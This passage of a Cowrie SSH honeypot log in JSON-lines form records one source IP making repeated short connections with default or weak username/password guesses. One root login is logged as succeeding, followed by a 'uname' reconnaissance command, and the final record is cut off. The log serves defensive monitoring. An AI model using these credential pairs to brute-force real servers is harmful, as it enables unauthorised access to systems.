{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:03.321293Z","src_ip":"212.227.125.160","session":"69715e6f0d62"}
{"eventid":"cowrie.login.failed","username":"sem2","password":"sem2","message":"login attempt [sem2/sem2] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:03.596448Z","src_ip":"212.227.125.160","session":"69715e6f0d62"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:04.733896Z","src_ip":"212.227.125.160","session":"69715e6f0d62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53092,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c458b0096eb","protocol":"ssh","message":"New connection: 212.227.125.160:53092 (1.2.3.4:22) [session: 2c458b0096eb]","sensor":"my-vps","timestamp":"2025-08-26T21:46:09.066060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:09.258780Z","src_ip":"212.227.125.160","session":"2c458b0096eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:09.259454Z","src_ip":"212.227.125.160","session":"2c458b0096eb"}
{"eventid":"cowrie.login.failed","username":"zrybs","password":"zrybs","message":"login attempt [zrybs/zrybs] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:09.927376Z","src_ip":"212.227.125.160","session":"2c458b0096eb"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:10.995005Z","src_ip":"212.227.125.160","session":"2c458b0096eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48562,"dst_ip":"1.2.3.4","dst_port":22,"session":"d229f5c961d6","protocol":"ssh","message":"New connection: 212.227.125.160:48562 (1.2.3.4:22) [session: d229f5c961d6]","sensor":"my-vps","timestamp":"2025-08-26T21:46:15.081443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:15.117617Z","src_ip":"212.227.125.160","session":"d229f5c961d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:15.174708Z","src_ip":"212.227.125.160","session":"d229f5c961d6"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:46:15.603179Z","src_ip":"212.227.125.160","session":"d229f5c961d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:46:16.531275Z","src_ip":"212.227.125.160","session":"d229f5c961d6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:46:16.532703Z","src_ip":"212.227.125.160","session":"d229f5c961d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:16.697231Z","src_ip":"212.227.125.160","session":"d229f5c961d6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:16.698216Z","src_ip":"212.227.125.160","session":"d229f5c961d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43946,"dst_ip":"1.2.3.4","dst_port":22,"session":"2626d49a96fd","protocol":"ssh","message":"New connection: 212.227.125.160:43946 (1.2.3.4:22) [session: 2626d49a96fd]","sensor":"my-vps","timestamp":"2025-08-26T21:46:21.329475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:21.339690Z","src_ip":"212.227.125.160","session":"2626d49a96fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:21.380039Z","src_ip":"212.227.125.160","session":"2626d49a96fd"}
{"eventid":"cowrie.login.failed","username":"cseadmin","password":"cseadmin","message":"login attempt [cseadmin/cseadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:21.582743Z","src_ip":"212.227.125.160","session":"2626d49a96fd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:22.655042Z","src_ip":"212.227.125.160","session":"2626d49a96fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39338,"dst_ip":"1.2.3.4","dst_port":22,"session":"eefa8e5d20ff","protocol":"ssh","message":"New connection: 212.227.125.160:39338 (1.2.3.4:22) [session: eefa8e5d20ff]","sensor":"my-vps","timestamp":"2025-08-26T21:46:26.764093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:26.774186Z","src_ip":"212.227.125.160","session":"eefa8e5d20ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:26.816993Z","src_ip":"212.227.125.160","session":"eefa8e5d20ff"}
{"eventid":"cowrie.login.failed","username":"lp","password":"lp","message":"login attempt [lp/lp] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:27.069781Z","src_ip":"212.227.125.160","session":"eefa8e5d20ff"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:28.168705Z","src_ip":"212.227.125.160","session":"eefa8e5d20ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34728,"dst_ip":"1.2.3.4","dst_port":22,"session":"36e9ce1a8dbf","protocol":"ssh","message":"New connection: 212.227.125.160:34728 (1.2.3.4:22) [session: 36e9ce1a8dbf]","sensor":"my-vps","timestamp":"2025-08-26T21:46:32.635175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:32.643457Z","src_ip":"212.227.125.160","session":"36e9ce1a8dbf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:32.695889Z","src_ip":"212.227.125.160","session":"36e9ce1a8dbf"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:32.926896Z","src_ip":"212.227.125.160","session":"36e9ce1a8dbf"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:33.984212Z","src_ip":"212.227.125.160","session":"36e9ce1a8dbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58344,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a19fe2ca9ad","protocol":"ssh","message":"New connection: 212.227.125.160:58344 (1.2.3.4:22) [session: 7a19fe2ca9ad]","sensor":"my-vps","timestamp":"2025-08-26T21:46:38.589137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:38.592879Z","src_ip":"212.227.125.160","session":"7a19fe2ca9ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:38.635038Z","src_ip":"212.227.125.160","session":"7a19fe2ca9ad"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:38.808425Z","src_ip":"212.227.125.160","session":"7a19fe2ca9ad"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:39.869737Z","src_ip":"212.227.125.160","session":"7a19fe2ca9ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53732,"dst_ip":"1.2.3.4","dst_port":22,"session":"154b8c585f6d","protocol":"ssh","message":"New connection: 212.227.125.160:53732 (1.2.3.4:22) [session: 154b8c585f6d]","sensor":"my-vps","timestamp":"2025-08-26T21:46:43.830262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:43.832232Z","src_ip":"212.227.125.160","session":"154b8c585f6d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:43.882189Z","src_ip":"212.227.125.160","session":"154b8c585f6d"}
{"eventid":"cowrie.login.failed","username":"jiffyexp-usr","password":"jiffyexp-usr","message":"login attempt [jiffyexp-usr/jiffyexp-usr] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:44.668325Z","src_ip":"212.227.125.160","session":"154b8c585f6d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:45.720666Z","src_ip":"212.227.125.160","session":"154b8c585f6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49118,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e00a1421613","protocol":"ssh","message":"New connection: 212.227.125.160:49118 (1.2.3.4:22) [session: 5e00a1421613]","sensor":"my-vps","timestamp":"2025-08-26T21:46:49.107000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:49.109877Z","src_ip":"212.227.125.160","session":"5e00a1421613"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:46:49.166153Z","src_ip":"212.227.125.160","session":"5e00a1421613"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456789","message":"login attempt [ubuntu/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T21:46:49.414166Z","src_ip":"212.227.125.160","session":"5e00a1421613"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:46:50.559106Z","src_ip":"212.227.125.160","session":"5e00a1421613"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44504,"dst_ip":"1.2.3.4","dst_port":22,"session":"83b7b3011b2b","protocol":"ssh","message":"New connection: 212.227.125.160:44504 (1.2.3.4:22) [session: 83b7b3011b2b]","sensor":"my-vps","timestamp":"2025-08-26T21:46:55.095017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:46:55.098988Z","src_ip":"212.227.125.160","session":"83b7b3011b2b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":["